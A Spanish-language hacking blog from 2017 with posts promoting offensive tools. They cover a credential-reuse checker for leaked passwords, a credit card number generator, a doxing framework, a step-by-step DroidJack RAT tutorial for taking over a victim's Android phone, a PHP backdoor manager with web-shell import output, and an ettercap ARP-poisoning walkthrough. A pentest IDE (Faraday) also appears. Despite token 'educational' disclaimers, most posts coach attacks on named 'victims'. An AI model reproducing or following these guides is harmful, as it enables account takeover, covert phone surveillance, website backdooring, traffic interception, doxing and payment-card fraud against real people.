HACKER ANGELWHITE GALC

viernes, 24 de noviembre de 2017

Cr3dOv3r

Tu mejor amigo en ataques de reutilización de credenciales.
Cr3dOv3r simplemente le das un correo electrónico y luego hace dos trabajos simples (pero útiles):
  • Busque filtraciones públicas para el correo electrónico y, si corresponde, regresa con todos los detalles disponibles sobre la fuga (utilizando la API del sitio de correos pirateados).
  • Ahora le das la contraseña vieja o filtrada de este correo electrónico, luego verifica estas credenciales contra 16 sitios web (por ejemplo: Facebook, Twitter, Google ...) y luego te dice si el inicio de sesión fue exitoso en cualquier sitio web.

Imagina conmigo este escenario

  • Usted verifica un correo electrónico específico con esta herramienta.
  • La herramienta lo encuentra en una fuga, por lo que abre el enlace de fuga.
  • Obtienes la contraseña filtrada después de buscar la fuga.
  • Ahora vuelve a la herramienta e ingresa esta contraseña para verificar si hay algún sitio web en el que el usuario use la misma contraseña.
  • Te imaginas el resto :sonreír:

Capturas de pantalla (no actualizado)

captura de pantalla


captura de pantalla


captura de pantalla

Uso

usage: Cr3d0v3r.py [-h] email

positional arguments:
  email       Email/username to check

optional arguments:
  -h, --help  show this help message and exit

Instalación y requisitos

Para que la herramienta funcione de la mejor manera, debe tener:

  • Python 3.xo 2.x (Preferido 3).
  • Sistema Linux o Windows (aún no probado en OSX).
  • Los requisitos mencionados en las siguientes líneas.

Instalación

+ Para Windows: (Después de descargar ZIP y subirla)
cd Cr3dOv3r-master
python -m pip3 install -r win_requirements.txt
python Cr3dOv3r.py -h
+ Para Linux:
git clone https://github.com/D4Vinci/Cr3dOv3r.git
chmod 777 -R Cr3dOv3r
cd Cr3dOv3r
pip3 install -r requirements.txt
python3 Cr3dOv3r.py -h
Cr3dOv3r se creó para mostrar cómo los ataques de reutilización de credenciales se vuelven peligrosos y no es responsable del uso indebido o de fines ilegales. ¡Úselo solo para Pentest o con fines educativos!
Lin para descargarla https://github.com/D4Vinci/Cr3dOv3r


















miércoles, 22 de noviembre de 2017

Script “RELDCC” para generar tarjetas de credito




Este es un script sencillo para generar tarjetas de credito a partir de otra o de un bin. El uso esta bajo su responsabilidad, el proyecto puede ser compilado en cualquier sistema operativo. En el caso de Linux abra una terminal y escriba lo que esta en el siguiente enlace.

Enlace de    https://github.com/ReldSec/RELDCC




“RELDCC” es un simple generador de tarjetas de credito escrito en C, tiene como objetivo la comprension de como es que funcionan esos famosos generadores como “Namso” o “Discard”, RELDCC proveé el código fuente de uno el cual pueden modificar y entender a su gusto, necesidad y sobre todo, perfeccionarlo.

Su uso es simple, en el caso de windows puede ser compilado desde DEV-C++ y en el caso de linux basta con ejecutar los comandos desde la terminal.

Con el paso de los días se irán haciendo actualizaciones al repositorio.”# RELDCC”



DFW es una herramienta de Doxing automatizada de Python

La imagen puede contener: texto

DFW es una herramienta de Doxing automatizada de Python para generar perfiles de destino
Doxing-Framework es una herramienta de Doxing automatizada para crear un perfil / archivo de caso limpio y fácilmente legible sobre el objetivo, esta herramienta tiene un menú integrado simple con opciones para una plantilla Dox para Doxing a Person e Info-sec / Recon
Dox-FrameWork actualmente solo admite la salida 'txt' en futuras versiones 'HTML' y 'PDF' serán compatibles
La salida está en el directorio actual.
cd DFW
chmod +x Doxing-Framework.py
python Doxing-Framework.py



viernes, 17 de noviembre de 2017

Cómo Hackear cualquier teléfono Android con DroidJack dentro la red Lan

Aprende a usar DroidJack para tomar el control sobre los dispositivos Android. Repasaremos paso a pasa cómo utilizar este RAT.
DroidJack es un troyano RAT para Android que le da el control sobre los dispositivos Android de su víctima. Este hack proporciona una interfaz sencilla de utilizar, por lo que puede visualizar, muy fácil, todas sus características.

¡IMPORTANTE!

DroidJack es una aplicación de pago. Pero aquí le daremos un enlace que encontramos en internet de forma gratis y que es la última versión. Por supuesto, al igual que yo, usted acepta el riesgo de descargar de una fuente desconocida.
El hack funciona para dos tipos de redes: LAN y WAN. La primera es más fácil de configurar, es por eso que esta primera parte esta dedicada a LAN. Por su parte, WAN necesita de mayor configuración y ya presentaremos pronto un tutorial dedicado a ello (en la parte 2).
Tabla de Contenido

1. DroidJack: Requerimientos

  • PC con Windows
  • Acceso a Internet
  • Red Wi-Fi
  • Java y Microsoft.net instalado (lo puedes descargar desde Niniteen este enlace)

2. Lo que puede hacer DroidJack

Con este hack usted tendrá acceso total al dispositivo de la victima. Entre las características que lo destaca tenemos:
  • Acceso a los archivos
  • Leer mensajes
  • Leer llamadas
  • Ver conversaciones de WhatsApp (sólo si el dispositivo está rooteado)
  • Ver contactos
  • Ver historial de navegación
  • GPS
  • Control remoto de Cámara, Vídeo y Voz.
  • Detalles del teléfono
  • Enviar mensajes a la pantalla
  • …mucho más…

¡Advertencia!

El siguiente tutorial es con fines educativos. Nadie te hace daño, no tienes por qué hacer daño.

3. Configurando DroidJack

  • PASO 1: En primer lugar descarga DroidJack desde este enlace o la fuente de descarga gratis abajo.
Link de descarga : https://urle.co/droidjackESGEEKS


Carpeta DroidJack 4



  • PASO 2: Ejecutar el DroidJack (es un archivo ejecutable JAR). A continuación, se le pedirá Un login, para ello, introduzca un nombre de usuario y contraseña.

DroidJack Login


  • PASO 3: Al hacer clic en el botón de desbloqueo se abrirá una interfaz GUI.
Interface DroidJack



  • PASO 4: Llenar los campos con los siguientes datos:
  • App Name: Virus (o el nombre que usted desee)
  • File Name: Virus (o el nombre que usted desee)
  • Dynamic DNS: Su IP (ver en: abrir CMD > escribir: ipconfig)
ipconfig en CMD

  • Port Number: 1337
  • Clic en Generate (el APK se generará con éxito y lo puede encontrar en la misma carpeta que su aplicación DroidJack)
Configuración DroidJack

Apk generated droidjack


4. Configuración de Puertos

Se necesitará tener los puertos 1334 y 1337 abiertos. Para ello vaya a Panel de Control > Busque “Firewall de Windows” > Firewall de Windows > Configuración Avanzada > Reglas de Entrada > Nueva Regla > Puerto > Escribir los puertos: Tanto el 1334 como el 1337 deben tener TCP y UDP [Más información aquí]
En mi caso, el Firewall lo administra mi programa McAfee Personal Firewall. Y la configuración es la siguiente:

Configuración Firewall Puertos McAfee

5. Pasos para Hackear un Dispositivo Android


  • PASO 5: Empezamos a “Escuchar”

    • Vamos a la sección de Devices y en la esquina inferior izquierda el puerto debe ser el mismo con el que se haya generado el archivo APK (en mi caso es 1337). Haga clic en Reception para empezar a “escuchar”.
      DroidJack APK Instalado
      Reception en DroidJack
      • PASO 6: La parte esencial: Envíe el RAT APK a su víctima por cualquier medio.
      El APK se guardará automáticamente en la carpeta de DroidJack.
      Instalar APK DroidJack

      • PASO 7: Después que la victima instala la aplicación, cuando haga clic en el “Button” obtendremos la sesión Android.




      DroidJack APK Instalado


      • PASO 8: Acceso al dispositivo. Como se puede ver a continuación el teléfono está en la lista de dispositivos.
      DroidJack device - Meizu


      Ahora hacer clic derecho en el dispositivo móvil dará una lista de opciones que se pueden utilizar.

      DroidJack Options


      Ahora para fines de demostración he utilizado Remote Eyes para tener acceso a la cámara.

      DroidJack Remote Eyes


      A continuación, desde la aplicación se verá una captura tomada a una laptop. Más demostraciones en el vídeo de demostración.

      6. Anotaciones Importantes

      • Dentro del archivo de descarga hay un manual con instrucciones: Readme (en inglés)
      • La primera vez que instala el APK desconecte la conexión WiFi.
      • Es posible que durante el control del dispositivo le aparezca una pantalla de “Permitir…”, deberá aceptar, o, ir la Gestión de Aplicaciones del celular y habilitar todos los permisos.
      • En la sección de Devices, Country no admite algunos países y no aparecerá la banderita. Algunos dispositivos no tienen registrados sus números de teléfonos y no se mostrarán.
      • Para leer los mensajes de WhatsApp el dispositivo debe estar rooteado.
      • Cuando la pantalla del celular se apague, tendrá que volver a iniciar la aplicación para tener acceso.
      • Las versiones de Android 4.4 en adelante no permite la opción de borrar los mensajes SMS.

      7. Vídeo de Demostración




      Queda pendiente el tutorial para la parte de WAN, en la que no es necesario que el dispositivo se encuentre en la misma red. Si te gustó el artículo, compártelo! y cualquier duda en los comentarios 





      FARADAY.....

      Logotipo de Faraday
      Faraday presenta un nuevo concepto: IPE (Integrated Penetration-Test Environment) una prueba de penetración multiusuario IDE. Diseñado para la distribución, indexación y análisis de los datos generados durante una auditoría de seguridad.
      El objetivo principal de Faraday es reutilizar las herramientas disponibles en la comunidad para aprovecharlas de forma multiusuario.
      Diseñados para simplificar, los usuarios no deben notar ninguna diferencia entre su propia aplicación de terminal y la que se incluye en Faraday. Desarrollado con un conjunto especializado de funcionalidades que ayudan a los usuarios a mejorar su propio trabajo. ¿Te acuerdas de programar tú mismo sin un IDE? Bueno, Faraday hace lo mismo que hace un IDE cuando programa, pero desde la perspectiva de una prueba de penetración.
      Por favor, lea las notas de LIBERACIÓN !
      GUI - Web

      Complementos

      ¡No cambies tu forma de trabajar hoy! Faraday juega bien con los demás, en este momento tiene más de 50 herramientas compatibles , entre ellas encontrará:
      Hay 3 tipos de complementos:
      • Complementos que interceptan comandos, disparados directamente cuando se detecta un comando en la consola. Estos son transparentes para usted y no se necesita ninguna acción adicional de su parte.
      • Complementos que importan informes de archivos. Debe copiar el informe a $ HOME / .faraday / report / [workspacename] (reemplazando [workspacename] con el nombre real de su Workspace) y Faraday lo detectará, procesará y agregará automáticamente al HostTree.
      • Conectores de complemento o en línea (BeEF, Metasploit, Burp), estos se conectan a API o bases de datos externas, o hablan directamente a la API de RPC de Faraday.

      Empezando

      Las siguientes plataformas son compatibles:
      plataforma
      Obtenga más información sobre plataformas compatibles y detalles de instalación .

      Instalación rápida

      Esto se aplica solo a Debian, Ubuntu, Kali y Backtrack. Para ver la guía de instalación completa, visite nuestra wiki .
      Descargue el último tarball o clone nuestro repositorio:
      $ git clone https://github.com/infobyte/faraday.git faraday-dev
      $ cd faraday-dev
      $ ./install.sh
      $ ./faraday-server.py
      $ ./faraday.py
      


      LInk para descargar: 

      https://github.com/infobyte/faraday


      jueves, 16 de noviembre de 2017





      Auditando Aplicacion Web
      Penetration Testing Realizando una auditoria de Seguridad a tu Sistema Operativo, por ><Mitnick Security ><
      Herramienta
      ShellStack - Una herramienta en PHP para administrar todos tus sitios
      ShellStack es una herramienta de gestión de puertas traseras basada en PHP. Esta herramienta es útil para “HACKERS” que desean mantener una pista de cada sitio web hackeados. La herramienta genera un archivo backdoor que sólo se tiene que subir al sitio y poner la URL de backdoor en el shells.txt presente en el directorio de la herramienta.
      Con ShellStack puedes
      Importar shells de PHP
      Obtener los detalles del servidor
      Subir archivos desde su sistema usando su terminal
      Y sobre todo puedes manejar tus puertas traseras de manera eficiente.
      Modo de uso
      Git clone https://github.com/Tuhinshubhra/shellstack
      Cd shellstack
      Php shellstack.php
      Generatebd y salir del uso de la herramienta CTRL + C – Esto generará un archivo backdoor en el mismo directorio que de la herramienta en un archivo llamado backdoor.php
      Subir el archivo Backdoor al sitio web de la víctima
      Copia la URL de puerta trasera y pégala en el archivo shells.txt presente en el directorio de la herramienta y guárdela (cada puerta trasera está separada por una nueva línea)
      Video
      Requerimientos:
      php
      curl
      Ejemplo:
      Código: Text
      user@computer:$ /home/redhaxor/Desktop/shellstack# php shellstack.php

      ________________________________________________________________________________
      _______ _ _ _______ _______ _______ _______ _______ _ _
      |______ |_____| |______ | | |______ | |_____| | |____/
      ______| | | |______ |_____ |_____ ______| | | | |_____ | \_
      ________________________________________________________________________________
      Simple Backdoor Management System
      Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra
      Shout Out: LulZSec India
      ================================================================================
      List Of Backdoors:
      0. http://localhost/backdoor.php
      =============================================
      [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0
      [+] Shell Selected: http://localhost/backdoor.php
      [+] Validating Backdoor: Backdoor Found!
      List Of Actions
      ================
      [1] Import PHP Shells
      [2] Server Details
      [3] Remove Backdoor
      [4] Remote File Upload
      [5] Exit
      [#] Select Option(1|2|3|4|5):2
      [+] Server Info
      [i] Sending Request And Getting Response...
      [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
      [i] Server IP: 127.0.0.1

      Press Enter To Continue

      List Of Actions
      ================
      [1] Import PHP Shells
      [2] Server Details
      [3] Remove Backdoor
      [4] Remote File Upload
      [5] Exit
      [#] Select Option(1|2|3|4|5):1

      List Of Shells
      ===============
      [1] Dhanush shell {User & Pass : shellstack123}
      [2] B374K shell {Pass : shellstack123}
      [3] Kurama shell V.1.0 {Pass : red}
      [4] WSO shell {Pass : shellstack123}
      [5] MiNi shell {User & Pass : shellstack123}
      [#] Select Shell To Import(1-5):1

      [i] Importing Shell...
      [i] Sending Request And Getting Response...
      [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php

      Press Enter To Continue

      List Of Actions
      ================
      [1] Import PHP Shells
      [2] Server Details
      [3] Remove Backdoor
      [4] Remote File Upload

      [5] Exit

      [#] Select Option(1|2|3|4|5):5
      root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack#
      Descarga:

      La imagen puede contener: texto





      lunes, 13 de noviembre de 2017

      REALIZANDO UN ATAQUE MAN IN THE MIDDLE



      Como se ha mencionado, un ataque man in the middle ocurre cuando un atacante se interpone entre dos víctimas, donde puede simplemente captar transmisiones entre ambas víctimas, o también puede modificar la comunicación. En esta la siguiente guia se realiza MITM con Kali (Linux), entre un equipo con Windows 7 y el default-gateway, captando la comunicación hacia internet.
      En windows 7 abrir un sitio Web, tomar nota de la mac e ip del default-gateway (arp -a), y la mac e ip del equipo con Kali.



      En Kali, hacer click en "Applications, Kali Linux, Sniffing/Spoofing, Network sniffers y ettercap-graphical".



      En el menu de ettercap, hacer click en "Unified Sniffing", para ingresar a las opcines de sniffing.


      Luego, se deben listar los hosts disponibles en la red para realizar el ataque, hacer click en "Hosts", y "Scan for Hosts". Ettercap comenzará con la identificación de los equipos, y se desplegará las opciones disponibles junto con la cantidad de equipos encontrados. Para listar los hosts, hacer click en "Hosts", y "Hosts List".


      En esta lista, aparecen los equipos con su ip y mac respectiva. Se debe seleccionar entre qué equipos se quiere realizar el ataque, para este caso, con las direcciones adquiridas en un comienzo, agregamos al target 1 el equipo con windows 7, y en el target 2, el default-gateway.


      En la parte inferior de ettercap, aparecen los hosts agregados a los targets respectivos.


      Con las direcciones agregadas a los targets, se hace click sobre el menu "mitm", y luego en "arp poisoning".


      En el pop-up, seleccionar el check-box "sniff remote conections".


      Con esto, ya tenemos interceptada la comunicación, los paquetes provenientes del equipo con windows 7 o el default-gateway, se encuentran redirigiendose hacia Kali.
      Para analizar que sitios web se encuentra revisando el usuario interceptado, se puede hacer click en el menu, "Plugins" , y "Manage the plugins".


      Posteriormente, hacer doble click en la opción, "remote- browser".


      Para comprobrar, se puede acceder a un sitio desde el equipo con windows7, (en este caso se ha ingresado a lun.cl. y se observa que el sitio web, carga relativamente levemente más lento).


      Además, se puede observar por consola en windows7, que la mac del default-gateway ha cambiado, y se encuentra duplicada, correspondiendo a la mac del equipo con Kali.


      Ahora, en ettercap se puede observar que van desplegandose los sitios visitados a traves de un browser, desde el equipo interceptado.


      También, desde Wireshark, se puede realizar un análisis del tráfico, observandose que el tráfico del equipo con windows7, es redirigido hacia el equipo con Kali, y luego, redirigido hacia el default-gateway, y viceversa.


      Finalmente, para detener el ataque se debe hacer click en el menu "mitm", y luego stop "mitm", y observar que el tráfico deja de pasar a traves del Kali.